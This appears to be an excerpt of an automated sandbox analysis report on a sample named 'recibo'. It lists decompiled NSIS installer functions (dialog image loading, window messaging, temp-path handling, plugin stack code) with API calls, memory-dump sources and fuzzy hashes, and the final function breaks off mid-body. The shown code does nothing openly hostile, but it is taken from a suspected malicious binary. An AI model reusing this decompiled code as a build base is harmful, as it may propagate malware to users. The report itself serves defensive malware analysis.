                                                                                  			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                  0x00401d81
                                                                                  0x00401d85
                                                                                  0x00401d9a
                                                                                  0x00401d87
                                                                                  0x00401d89
                                                                                  0x00401d8f
                                                                                  0x00401d8f
                                                                                  0x00401da0
                                                                                  0x00401da3
                                                                                  0x00401dad
                                                                                  0x00401db0
                                                                                  0x00401db8
                                                                                  0x00401dc9
                                                                                  0x00401dcc
                                                                                  0x00401dd7
                                                                                  0x00401dce
                                                                                  0x00401dd0
                                                                                  0x00401dd0
                                                                                  0x00401ddb
                                                                                  0x00401de5
                                                                                  0x00401e0c
                                                                                  0x00401e1b
                                                                                  0x00401e29
                                                                                  0x00401e31
                                                                                  0x00401e39
                                                                                  0x00401e39
                                                                                  0x00401e42
                                                                                  0x00401e48
                                                                                  0x00402ba4
                                                                                  0x00402ba4
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                  • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                  • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                  • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 715416BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E715416BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                  0x715416d7
                                                                                  0x715416e3
                                                                                  0x715416f0
                                                                                  0x715416f7
                                                                                  0x71541700
                                                                                  0x7154170c

                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,715422D8,?,00000808), ref: 715416D5
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,715422D8,?,00000808), ref: 715416DC
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,715422D8,?,00000808), ref: 715416F0
                                                                                  • GetProcAddress.KERNEL32(715422D8,00000000), ref: 715416F7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71541700
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                  • String ID:
                                                                                  • API String ID: 1148316912-0
                                                                                  • Opcode ID: 3eda2260acc158675a4d60b881341d3982ae106a4d15d9e7acb20dfb177b08cd
                                                                                  • Instruction ID: 3ce8efe4ae49663dd8f89606855c650b8aa8affde8499ca3087e50b62f5c2e47
                                                                                  • Opcode Fuzzy Hash: 3eda2260acc158675a4d60b881341d3982ae106a4d15d9e7acb20dfb177b08cd
                                                                                  • Instruction Fuzzy Hash: E0F0127314A1387BD62016A78C4CD9B7E9CDF8B2F5B120211F62C9119086725C11D7F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 59%
                                                                                  			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                  0x00401c43
                                                                                  0x00401c45
                                                                                  0x00401c4c
                                                                                  0x00401c4f
                                                                                  0x00401c52
                                                                                  0x00401c5c
                                                                                  0x00401c60
                                                                                  0x00401c63
                                                                                  0x00401c6c
                                                                                  0x00401c6c
                                                                                  0x00401c6f
                                                                                  0x00401c73
                                                                                  0x00401c7c
                                                                                  0x00401c7c
                                                                                  0x00401c7f
                                                                                  0x00401c83
                                                                                  0x00401c85
                                                                                  0x00401cda
                                                                                  0x00401cdc
                                                                                  0x00401ce7
                                                                                  0x00401cf1
                                                                                  0x00401cf4
                                                                                  0x00401cf4
                                                                                  0x00401cfd
                                                                                  0x00000000
                                                                                  0x00401c87
                                                                                  0x00401c8e
                                                                                  0x00401c90
                                                                                  0x00401c93
                                                                                  0x00401c99
                                                                                  0x00401ca0
                                                                                  0x00401ca3
                                                                                  0x00401ccb
                                                                                  0x00401d03
                                                                                  0x00401d03
                                                                                  0x00401ca5
                                                                                  0x00401cb3
                                                                                  0x00401cbb
                                                                                  0x00401cbe
                                                                                  0x00401cbe
                                                                                  0x00401ca3
                                                                                  0x00401d06
                                                                                  0x00401d09
                                                                                  0x00401d0f
                                                                                  0x00402ba4
                                                                                  0x00402ba4
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                  • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                  • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                  • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 77%
                                                                                  			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                                                                                  0x00404d4f
                                                                                  0x00404d54
                                                                                  0x00404d5c
                                                                                  0x00404d5d
                                                                                  0x00404d6a
                                                                                  0x00404d72
                                                                                  0x00404d73
                                                                                  0x00404d75
                                                                                  0x00404d77
                                                                                  0x00404d79
                                                                                  0x00404d7c
                                                                                  0x00404d7c
                                                                                  0x00404d83
                                                                                  0x00404d89
                                                                                  0x00404d89
                                                                                  0x00404d90
                                                                                  0x00404d97
                                                                                  0x00404d9a
                                                                                  0x00404d9d
                                                                                  0x00404d9d
                                                                                  0x00404da1
                                                                                  0x00404db1
                                                                                  0x00404db3
                                                                                  0x00404db6
                                                                                  0x00404d5f
                                                                                  0x00404d5f
                                                                                  0x00404d66
                                                                                  0x00404d66
                                                                                  0x00404dbe
                                                                                  0x00404dc9
                                                                                  0x00404ddf
                                                                                  0x00404df0
                                                                                  0x00404e0c

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                  • wsprintfW.USER32 ref: 00404DF0
                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s
                                                                                  • API String ID: 3540041739-3551169577
                                                                                  • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                  • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                  • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                  • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 53%
                                                                                  			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                  0x00405f20
                                                                                  0x00405f2b
                                                                                  0x00405f2f
                                                                                  0x00405f36
                                                                                  0x00405f42
                                                                                  0x00405f52
                                                                                  0x00405f54
                                                                                  0x00405f6c
                                                                                  0x00405f6d
                                                                                  0x00405f74
                                                                                  0x00405f75
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405f58
                                                                                  0x00405f5f
                                                                                  0x00405f67
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405f5f
                                                                                  0x00405f77
                                                                                  0x00000000
                                                                                  0x00405f8b
                                                                                  0x00405f44
                                                                                  0x00405f4a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405f4a
                                                                                  0x00405f31
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                  • String ID: 44w$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 3248276644-513344976
                                                                                  • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                  • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                  • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                  • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 58%
                                                                                  			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                  0x00405e0d
                                                                                  0x00405e1a
                                                                                  0x00405e1b
                                                                                  0x00405e26
                                                                                  0x00405e2e
                                                                                  0x00405e2e
                                                                                  0x00405e36

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 2659869361-3355392842
                                                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                  • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                  • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 715410E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 91%
                                                                                  			E715410E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x7154506c = _a8;
				 *0x71545070 = _a16;
				 *0x71545074 = _a12;
				_a12( *0x71545048, E71541651, _t73);
				_t66 =  *0x7154506c +  *0x7154506c * 4 << 3;
				_t27 = E715412E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x71545040;
							if( *0x71545040 == 0) {
								goto L26;
							}
							E71541603( *0x71545074, _t31 + 4, _t66);
							_t34 =  *0x71545040;
							_t86 = _t86 + 0xc;
							 *0x71545040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E71541312(E7154135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E71541381(_t80, E715412E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E71541603(_t10,  *0x71545074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x71545040;
							 *0x71545040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x71545070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E71541603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x7154506c +  *0x7154506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E71541603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x71545070);
						 *( *0x71545070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
